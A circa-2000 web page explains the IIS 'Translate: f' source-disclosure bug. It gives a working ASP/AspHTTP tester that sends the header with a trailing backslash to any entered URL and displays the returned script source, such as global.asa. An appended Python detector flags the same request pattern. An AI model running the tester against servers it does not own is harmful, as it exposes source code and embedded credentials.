Translate: f Bug
This latest security hole (discovered in the July 2000 time-frame) is triggered by any HTTP client (TELNET, AspHTTP, etc.) that sends a custom "Translate: f" header together with a URL that has a backslash (\) appended to it; the server then returns the script file itself instead of running it.
Read the full story at http://www.4guysfromrolla.com/webtech/081500-1.shtml
If you want to know all the ins and outs of ASP security, join http://www.asplists.com/aspsecurity, where that is all we discuss.
The component used in this script, AspHTTP, is a third-party component from www.serverobjects.com. The script uses this component (as opposed to WinInet or XMLHTTP) because it is a thread-safe way to retrieve a URL; see http://www.learnasp.com/advice/threadsafe.asp
<Test Scripts Below: first the form, then the page it posts to>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>TranslateFbug</title>
</head>
<body>
<p>Enter URL<br>
for example http://www.whatever.com/default.asp<br>
for example http://www.whatever.com/global.asa</p>
<form method="POST" action="translatefbugrespond.asp">
<p><input type="text" name="URL" size="68"><br>
<input type="submit" value="Check This URL for The TranslateF bug" name="Button"></p>
</form>
</body>
</html>
<html><head>
<title>asphttptranslatebug.asp</title>
</head>
<body>
<%
' Save this page as translatefbugrespond.asp, the action of the form above.
Dim HttpObj, theURL, strResult
Set HttpObj = Server.CreateObject("AspHTTP.Conn")
theURL = Request("URL")
' The tester needs an absolute URL; refuse anything without the scheme.
If InStr(LCase(theURL), "http://") = 0 Then
    Response.Write "You omitted http://<br>"
    Response.Write "this tester requires the http:// before any URL to be tested"
    Response.End
End If
' Append the trailing backslash and add the Translate: f header that together trigger the bug.
HttpObj.Url = theURL & "\"
HttpObj.AddExtraHeader ("Translate: f")
strResult = HttpObj.GetURL
' HTML-encode the response so any script source that comes back is displayed, not rendered.
strResult = Server.HTMLEncode(strResult)
strResult = Replace(strResult, vbCrLf, "<br>")
Response.Write strResult
Set HttpObj = Nothing
%>
</body>
</html>
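For the defending side, here is an added example (not code from learnasp.com or from ServerObjects) of a small Python request inspector that flags the exact pattern the tester above sends: a Translate: f header combined with a request path ending in a backslash. It goes slightly beyond the page by also accepting the URL-encoded %5c form of the backslash; the sample requests are constructed for illustration.

```python
"""Flag HTTP requests that match the 'Translate: f' + trailing-backslash pattern.

Added example, not the page's own code. Suitable for a reverse proxy hook or a
script that reviews captured request heads. The sample traffic is constructed.
"""
from typing import Dict, List, Tuple


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, path, lower-cased headers)."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    parts = lines[0].split()
    method, path = parts[0], parts[1]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_translate_f_probe(raw: str) -> bool:
    """True when the request carries 'Translate: f' AND its path ends in a backslash.

    Office and FrontPage WebDAV clients send Translate: f on legitimate requests,
    so the header alone is not enough; the trailing backslash is the tell.
    """
    _method, path, headers = parse_request(raw)
    translate = headers.get("translate", "").lower()
    # Accept both the literal backslash and its URL-encoded form (%5c).
    ends_with_backslash = path.endswith("\\") or path.lower().endswith("%5c")
    return translate == "f" and ends_with_backslash


def find_probes(requests: List[str]) -> List[str]:
    """Return the request line of every request that matches the pattern."""
    return [r.split("\n", 1)[0].strip() for r in requests if is_translate_f_probe(r)]


# Constructed sample traffic: one probe, one plain WebDAV-style request, one plain GET.
SAMPLE_REQUESTS = [
    "GET /global.asa\\ HTTP/1.1\r\nHost: www.example.test\r\nTranslate: f\r\n\r\n",
    "GET /default.asp HTTP/1.1\r\nHost: www.example.test\r\nTranslate: f\r\n\r\n",
    "GET /default.asp HTTP/1.1\r\nHost: www.example.test\r\n\r\n",
]

if __name__ == "__main__":
    for line in find_probes(SAMPLE_REQUESTS):
        print("Translate: f probe:", line)
```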